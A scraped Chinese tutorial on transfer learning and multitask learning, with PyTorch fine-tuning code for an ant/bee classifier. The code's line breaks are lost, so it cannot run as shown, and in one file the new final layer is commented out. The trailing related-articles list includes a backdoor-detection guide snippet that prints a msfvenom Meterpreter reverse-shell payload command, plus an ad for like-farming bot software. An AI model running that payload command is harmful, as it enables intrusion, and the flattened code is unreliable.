【PyTorch][chapter 25][李宏毅深度学习][Transfer Learning-1]

前言:

       迁移学习是一种机器学习的方法,指的是一个预训练的模型被重新用在另一个任务中。

比如已经有个模型A 实现了猫狗分类

    

模型B 要实现大象和老虎分类,可以利用训练好的模型A 的一些参数特征,简化当前的训练

过程.

目录:

  1.    简介
  2.    Model Fine-Tuning (模型微调)
  3.    multitask learning( 多任务学习)
  4.    Python 例子

一 简介

        Transfer Learning 是一种常用的深度学习方案.

如下图:

           Task A:  通过语音识别台语.   但是 Task Data 中数据集非常少,很难训练出好的模型A,

           TaskB:  通过语音识别中英文.  我们很容易获得大量 Source Data,,我们是否可以先 训练一个模型B,实现中英文文语音识别. 然后再通过模型B 的参数去实现 Task A呢?

        同样在图像识别,文本分类依然存在同样的场景,需要做的Task A 的 Target Data 非常少,是否

可以利用相似的TaskB ,反过来优化任务A。


二  Model Fine-Tuning (模型微调)

     source Data : (x^s,y^s)已经打了标签,有大量的数据集

     Target Data:  (x^t,y^t) 未打标签,极少量的数据集,是Target Task.

      方案:

          1: 先通过 source Data 训练一个模型B,实现Task B

           2:再通过参数微调得到模型A,实现Task A

   下面介绍几个方案

2.1 Conservation Training 1(保守的微调)

 1: 利用source Data 训练出 model B

 2:   利用model B 的模型参数初始化 model A

3:   利用Task Data,  只训练几个epoch ,这样model B 和 model A 的参数尽可能的接近

 如上面实现猫狗分类 到  老虎和大象分类的例子

2.2 Conservation Training 2 (保守的微调)

 1: 利用source Data 训练出 model B

 2:   利用model B 的模型参数初始化 model A

3:    固定部分layer ,利用Target Data 训练剩下来的layer

 在语音识别中:    通常copy最后几层,   通过Target Data 训练接近输入层的layer

 在图像识别中:  通常copy 前面几层,  通过Target Data 训练接近输出层的layer


二  multitask learning( 多任务学习)

2.1 自动驾驶案例

     我们需要实时对图像进行车辆检测、车道线分割、景深估计等 。传统的方式使是基于单任务学习(Single-Task Learning,STL),即每个 任务 使用一个独立的模型。

      多任务使用一个模型实现多任务的预测。输入一张图片,通过不同的Decoder 实现不同任务的检测

2.2 语音识别案例

输入一段语音,使用相同的Encoder,不同的Decoder来训练多任务,实现中文,法文,日文,英文文字识别任务。

2.3 为什么要使用该方案

1: 实验效果
   很多实验效果证明多任务系统相对于当任务有更好的效果。
   比如语音识别例子中,语料库里面 法文标签的数据集非常少,我们可以通过Multi-Task Learning
   比单独训练 法文Model 具有更好的效果.
   每个任务可以选择性的利用其他任务中学习到的隐藏特征,提高自身能力;

2  训练效率更高
  多个任务使用一个共享的Encoder,更少的GPU显存占用,更快的处理性能;
 
3   泛化性更强
     在多个任务的数据集上训练,任务之间有一定相关性,相当于一种隐式的数据增强,可以提高模型泛化能力;

4  防止模型过拟合
    兼顾多个任务,一定程度上避免了模型过拟合到单个任务的训练集;

5  更好的特征表达
   共享的Encoder输出满足多任务的,相比STL可以获得更好的特征表达;


三 Progressive Neural Networks(增量学习)

Step 1:构建 Model 1,   通过task1的数据集训练 Model 1

Step 2:固定Model 1,构建Model 2,把task2 的数据集输入Model 1,其每一层的输出添加进Model2 的输入层, 训练Model 2

                

Step 3: 固定Model1,Model2, 构建Model 3,然后同上一样的方法连接到第三个神经网络中,

训练Model 3

下面给出两个简单的例子

# -*- coding: utf-8 -*-
"""
Created on Sun Apr  7 14:53:19 2024@author: chengxf2
"""
from torch import nn
from torchvision import  models
import torchvision
import torch.optim as optim
from torch.optim import lr_scheduler
import torchdevice = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")def net():# 加载预训练模型model = models.vgg16(pretrained=True)  print(model)for parameter in model.parameters():# 冻结了所有层(参数不会更新)parameter.requires_grad = False	  #查看model.parameters()的参数    model.classifier[6] = nn.Linear(in_features=4096, out_features=2, bias=True)for name,param in model.named_parameters():print(name, param.requires_grad)return modeldef netFin():# 加载预训练模型model_conv = torchvision.models.resnet18(pretrained=True)  for param in model_conv.parameters():param.requires_grad = False# Parameters of newly constructed modules have requires_grad=True by defaultnum_ftrs = model_conv.fc.in_featuresmodel_conv.fc = nn.Linear(num_ftrs, 2)for name,param in model_conv.named_parameters():print(name, param.requires_grad)model_conv = model_conv.to(device)criterion = nn.CrossEntropyLoss()# Observe that only parameters of final layer are being optimized as# opposed to before.optimizer_conv = optim.SGD(model_conv.fc.parameters(), lr=0.001, momentum=0.9)# Decay LR by a factor of 0.1 every 7 epochsexp_lr_scheduler = lr_scheduler.StepLR(optimizer_conv, step_size=7, gamma=0.1)netFin()


四  Python 例子

利用resnet18 来进行昆虫分类,默认是实现1000种分类。

现在把全连接层改成二分类:分类蚂蚁和蜜蜂,只要训练1-2轮

精确度可以达到90%以上。

项目分为三个部分

1: data.py 加载数据集

2: train.py  训练模型

3: model.py 模型部分

数据集

 https://download.csdn.net/download/weixin_46233323/12182815

1: train.py 

# -*- coding: utf-8 -*-
"""
Created on Sun Apr  7 15:28:16 2024@author: chengxf2
"""import torch
from model import netFin
import time
from tempfile import TemporaryDirectory
import os
from data import create_dataset
import matplotlib.pyplot as plt
from data import imshowdevice = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")def visualize_model(model, dataloaders,class_names, num_images,device):was_training = model.trainingmodel.eval()images_so_far = 0fig = plt.figure()with torch.no_grad():for i, (inputs, labels) in enumerate(dataloaders['val']):inputs = inputs.to(device)labels = labels.to(device)outputs = model(inputs)_, preds = torch.max(outputs, 1)for j in range(inputs.size()[0]):images_so_far += 1ax = plt.subplot(num_images//2, 2, images_so_far)ax.axis('off')ax.set_title(f'predicted: {class_names[preds[j]]}')imshow(inputs.cpu().data[j])if images_so_far == num_images:model.train(mode=was_training)returnmodel.train(mode=was_training)def train_model(model, criterion, optimizer, scheduler, num_epochs,dataloaders,dataset_sizes):# Create a temporary directory to save training checkpointswith TemporaryDirectory() as tempdir:best_model_params_path = os.path.join(tempdir, 'best_model_params.pt')torch.save(model.state_dict(), best_model_params_path)best_acc = 0.0print("\n --train---")start_time = time.time()for epoch in range(num_epochs):epoch_start_time = time.time()#print(f'Epoch {epoch}/{num_epochs - 1}')#print('-' * 10)# Each epoch has a training and validation phasefor phase in ['train', 'val']:if phase == 'train':model.train()  # Set model to training modeelse:model.eval()   # Set model to evaluate moderunning_loss = 0.0running_corrects = 0# Iterate over data.for inputs, labels in dataloaders[phase]:inputs = inputs.to(device)labels = labels.to(device)# zero the parameter gradientsoptimizer.zero_grad()# forward# track history if only in trainwith torch.set_grad_enabled(phase == 'train'):outputs = model(inputs)_, preds = torch.max(outputs, 1)loss = criterion(outputs, labels)# backward + optimize only if in training phaseif phase == 'train':loss.backward()optimizer.step()# statisticsrunning_loss += loss.item() * inputs.size(0)running_corrects += torch.sum(preds == labels.data)if phase == 'train':scheduler.step()epoch_loss = running_loss / dataset_sizes[phase]epoch_acc = running_corrects.double() / dataset_sizes[phase]#print(f'{phase} Loss: {epoch_loss:.4f} Acc: {epoch_acc:.4f}')# deep copy the modelif phase == 'val' and epoch_acc > best_acc:best_acc = epoch_acctorch.save(model.state_dict(), best_model_params_path)print('End of epoch %d   Time Taken: %d sec' % (epoch,  time.time() - epoch_start_time),f'{phase} Loss: {epoch_loss:.4f} Acc: {epoch_acc:.4f}')time_elapsed = time.time() - start_timeprint(f'Training complete in {time_elapsed // 60:.0f}m {time_elapsed % 60:.0f}s')print(f'Best val Acc: {best_acc:4f}')# load best model weightsmodel.load_state_dict(torch.load(best_model_params_path))return modelif __name__ == '__main__':num_epochs = 20num_images = 6dataloaders,dataset_sizes,class_names = create_dataset()model, criterion, optimizer, scheduler = netFin()train_model(model, criterion, optimizer, scheduler, num_epochs,dataloaders,dataset_sizes)visualize_model(model, dataloaders,class_names, num_images,device)

2: data.py

# -*- coding: utf-8 -*-
"""
Created on Sun Apr  7 15:37:38 2024@author: chengxf2
"""
import os
import torch
from torchvision import datasets, models, transforms
import numpy as np
from PIL import Image
import matplotlib.pyplot as plt
import torchvisiondef visualize_model_predictions(model,data_transforms,img_path,device,class_names):was_training = model.trainingmodel.eval()img = Image.open(img_path)img = data_transforms['val'](img)img = img.unsqueeze(0)img = img.to(device)with torch.no_grad():outputs = model(img)_, preds = torch.max(outputs, 1)ax = plt.subplot(2,2,1)ax.axis('off')ax.set_title(f'Predicted: {class_names[preds[0]]}')imshow(img.cpu().data[0])model.train(mode=was_training)def imshow(inp, title=None):"""Display image for Tensor."""#[channel=3, 228, 228*batch_size]inp = inp.numpy().transpose((1, 2, 0))#[228, 228*batch_size, channel=3]mean = np.array([0.485, 0.456, 0.406])std = np.array([0.229, 0.224, 0.225])inp = std * inp + meaninp = np.clip(inp, 0, 1)#(行, 列, channel):具有RGB值(0-1浮点数或0-255整数)的图像。plt.imshow(inp)if title is not None:plt.title(title)plt.pause(0.001)  # pause a bit so that plots are updateddef create_dataset():# Data augmentation and normalization for training# Just normalization for validationimage_datasets={}dataloaders={}dataSize ={}data_transforms = {'train': transforms.Compose([transforms.RandomResizedCrop(224),transforms.RandomHorizontalFlip(),transforms.ToTensor(),transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]),'val': transforms.Compose([transforms.Resize(256),transforms.CenterCrop(224),transforms.ToTensor(),transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]),}data_dir = 'hymenoptera_data'for x in ['train', 'val']:image_datasets[x]= datasets.ImageFolder(os.path.join(data_dir, x),data_transforms[x])for x  in ['train', 'val']:dataloaders[x] = torch.utils.data.DataLoader(image_datasets[x], batch_size=2,shuffle=True)for x in ['train', 'val']:dataSize[x]= len(image_datasets[x])#device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")#print(type(dataloaders))class_names = image_datasets['train'].classesreturn  dataloaders, dataSize,class_names'''  # Get a batch of training data
dataloaders, class_names= create_dataset(None)
inputs, classes = next(iter(dataloaders['train']))  
#[batch, channel, width, hight]
#print(inputs.shape)
#torch.Size([4, 3, 224, 224])
# Make a grid from batchdataloaders
out = torchvision.utils.make_grid(inputs)imshow(out, title=[class_names[x] for x in classes])
'''

3:model.py

# -*- coding: utf-8 -*-
"""
Created on Sun Apr  7 14:53:19 2024@author: chengxf2
"""
from torch import nn
from torchvision import  models
import torchvision
import torch.optim as optim
from torch.optim import lr_scheduler
import torch
from torchsummary import summarydevice = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")def net():# 加载预训练模型model = models.vgg16(pretrained=True)  print(model)for parameter in model.parameters():# 冻结了所有层(参数不会更新)parameter.requires_grad = False	  #查看model.parameters()的参数    model.classifier[6] = nn.Linear(in_features=4096, out_features=2, bias=True)for name,param in model.named_parameters():print(name, param.requires_grad)return modeldef netFin():# 加载预训练模型model_conv = torchvision.models.resnet18(pretrained=True)  for param in model_conv.parameters():param.requires_grad = False# Parameters of newly constructed modules have requires_grad=True by defaultnum_ftrs = model_conv.fc.in_features#打印出默认的网络结构summary(model_conv, (3, 512, 512))  # 输出网络结构#model_conv.fc = nn.Linear(num_ftrs, 2)'''# Debug infofor name,param in model_conv.named_parameters():print(name, param.requires_grad)'''model_conv = model_conv.to(device)criterion = nn.CrossEntropyLoss()# Observe that only parameters of final layer are being optimized as# opposed to before.optimizer = optim.SGD(model_conv.fc.parameters(), lr=0.001, momentum=0.9)# Decay LR by a factor of 0.1 every 7 epochsexp_lr_scheduler = lr_scheduler.StepLR(optimizer, step_size=7, gamma=0.1)return model_conv, criterion, optimizer, exp_lr_scheduler


Multi-Task Learning 多任务学习 - 知乎

Transfer Learning for Computer Vision Tutorial — PyTorch Tutorials 2.2.1+cu121 documentation

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/801363.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

应急响应-后门攻击检测指南Rookit内存马权限维持WINLinux

一、演示案例-Windows-后门-常规&权限维持&内存马 1、常规MSF后门-网络连接分析 常规后门: msfvenom -p windows/meterpreter/reverse_tcp lhostxx.xx.xx.xx lport6666 -f exe -o shell.exe2、权限维持后门-分析检测 自启动测试 REG ADD "HKCU\SO…

vue做游戏vue游戏引擎vue小游戏开发

Vue.js 是一个构建用户界面的渐进式JavaScript框架,它同样可以用于游戏开发。使用 Vue 开发游戏通常涉及以下几个关键步骤和概念: 1. 了解 Vue 的核心概念 1 在开始使用 Vue 进行游戏开发之前,你需要理解 Vue 的一些核心概念,如…

抖音在线点赞任务发布接单运营平台PHP网站源码 多个支付通道+分级会员制度

源码介绍 1、三级代理裂变,静态返佣/动态返佣均可设置。(烧伤制度)。 2、邀请二维码接入防红跳转。 3、自动机器人做任务,任务时间可设置,机器人价格时间可设置。 4、后台可设置注册即送X天机器人。 5、不同级别会…

uniapp开发笔记----配置钉钉小程序

uniapp开发笔记----配置钉钉小程序 1. 项目根目录添加package.json文件2. 之后点击运行就可以看到已经添加了钉钉小程序3. 如果首次使用需要配置 其他功能待开发。。。 接上一章之后,我想要把项目配置成钉钉小程序 官方文档点击这里 1. 项目根目录添加package.json…

NzN的数据结构--二叉树part2

上一章我们介绍了二叉树入门的一些内容,本章我们就要正式开始学习二叉树的实现方法,先三连后看是好习惯!!! 目录 一、二叉树的顺序结构及实现 1. 二叉树的顺序结构 2. 堆的概念及结构 3. 堆的实现 3.1 堆的创建 …

Idea 通过 Tomcat 启动项目时出现“错误:找不到或无法加载主类 ecoding”

问题描述 在Idea中通过Tomcat启动项目时,出现 “错误:找不到或无法加载主类 ecoding” 原因 在Tomcat - Eidt Configurations....中配置VM options时出现了错误,可以查看下该配置是否填写正确;

2024-04-08 NO.5 Quest3 手势追踪进行 UI 交互

文章目录 1 玩家配置2 物体配置3 添加视觉效果4 添加文字5 其他操作5.1 双面渲染5.2 替换图片 ​ 在开始操作前,我们导入先前配置好的预制体 MyOVRCameraRig,相关介绍在 《2024-04-03 NO.4 Quest3 手势追踪抓取物体-CSDN博客》 文章中。 1 玩家配置 &a…

全自动ai生成视频MoneyPrinterTurbo源码

功能介绍 完整的 MVC架构,代码 结构清晰,易于维护,支持 API 和 Web界面 支持视频文案 AI自动生成,也可以自定义文案支持多种 高清视频 尺寸 竖屏 9:16,1080x1920 横屏 16:9,1920x1080 支持 批量视频生成&am…

PHP基础

搭建环境 网站基本概念 服务器概念 服务器是为电脑提供服务的电脑,本地电脑如果有公网IP,那也能当作服务器工作服务器是计算机的一种,它比普通计算机运行更快,负载更高、价格更贵。 服务器在网络中为其它客户机(如P…

借助 Aspose.Words,在 C# 中将图片转换为 Word

Microsoft Word 提供了多种用于生成具有增强的格式化功能的文本文档的工具。除了文本格式之外,我们还可以将各种图形元素和图像合并到Word文档中。在某些情况下,我们可能需要将图片或照片插入DOC或DOCX格式的Word文档中。在本文中,我们将学习…

DevOps已死?2024年的DevOps将如何发展

随着我们进入2024年,DevOps也发生了变化。新兴的技术、变化的需求和发展的方法正在重新定义有效实施DevOps实践。 IDC预测显示,未来五年,支持DevOps实践的产品市场继续保持健康且快速增长,2022年-2027年的复合年增长率&#xff0…

【神经网络】卷积神经网络CNN

卷积神经网络 欢迎访问Blog全部目录! 文章目录 卷积神经网络1. 神经网络概览2.CNN(Convolutional Neunal Network)2.1.学习链接2.2.CNN结构2.2.1.基本结构2.2.1.1输入层2.2.1.2.卷积层|Convolution Layers2.2.1.3.池化层|Pooling layers2.3…

k8s部署efk

环境简介: kubernetes: v1.22.2 helm: v3.12.0 elasticsearch: 8.8.0 chart包:19.10.0 fluentd: 1.16.2 chart包: 5.9.4 kibana: 8.2.2 chart包:10.1.9 整体架构图: 一、Elasticsearch安装…

归一化技术比较研究:Batch Norm, Layer Norm, Group Norm

归一化层是深度神经网络体系结构中的关键,在训练过程中确保各层的输入分布一致,这对于高效和稳定的学习至关重要。归一化技术的选择(Batch, Layer, GroupNormalization)会显著影响训练动态和最终的模型性能。每种技术的相对优势并…

Codeforces Round 938 (Div. 3) A - F 题解

A. Yogurt Sale 题意:要购买n个酸奶,有两种买法,一种是一次买一个,价格a。一种是一次买两个,价格b,问买n个酸奶的最小价格。 题解:很容易想到用2a和b比较,判断输出即可。 代码&am…

麻雀优化算法(Sparrow Search Algorithm)

注意:本文引用自专业人工智能社区Venus AI 更多AI知识请参考原站 ([www.aideeplearning.cn]) 算法背景 麻雀算法(Sparrow Search Algorithm, SSA)是一种受自然界麻雀群体行为启发的优化算法。想象一下,一…

【MacOs】proxychains配置使用

一、开始 1. 安装proxychains 使用brew进行安装 brew install proxychains-ng没有homebrew的,可以使用该命令安装 /usr/bin/ruby -e "$(curl -fsSL https://cdn.jsdelivr.net/gh/ineo6/homebrew-install/install)"2. 配置代理配置文件 cd /opt/homeb…

day5 nest商业项目初探·一(java转ts全栈/3R教室)

背景:从头一点点学起太慢了,直接看几个商业项目吧,看看根据Java的经验,自己能看懂多少,然后再系统学的话也会更有针对性。先看3R教室公开的 kuromi 移民机构官方网站吧 【加拿大 | 1.5w】Nextjs:kuromi 移民…

专业140+总410+国防科技大学831信号与系统考研经验国防科大电子信息与通信,真题,大纲,参考书。

应群里同学要求,总结一下我自己的复习经历,希望对大家有所借鉴,报考国防科技大学,专业课831信号与系统140,总分410,大家以前一直认为国防科技大学时军校,从而很少关注这所军中清华,现…

Java 基于微信小程序的助农扶贫小程序

博主介绍:✌Java徐师兄、7年大厂程序员经历。全网粉丝13w、csdn博客专家、掘金/华为云等平台优质作者、专注于Java技术领域和毕业项目实战✌ 🍅文末获取源码联系🍅 👇🏻 精彩专栏推荐订阅👇🏻 不…